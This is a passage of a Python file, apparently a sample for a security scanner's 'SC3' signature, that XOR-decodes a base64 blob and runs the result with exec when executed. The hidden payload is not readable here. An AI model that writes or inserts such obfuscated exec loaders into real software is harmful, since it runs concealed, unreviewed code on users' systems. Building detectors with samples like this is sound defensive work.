2exMgZ/hYW3F+ELClrNvLJi+TMnKvX4ly4M+ruCzLW3LpRmAmuFiLo6lH8y6/H0ohf4Pj46/LT6DswCO18d/OI7/ZuiD9S0StLgNj4/MUm3W60zAtcxgLIK4M73IqQdty/ZMj4v6Y2XC3A=="
_K = bytes.fromhex("0d4debd66ce2ea93")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    raw = base64.b64decode(_BLOB)
    return _xor(raw, _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
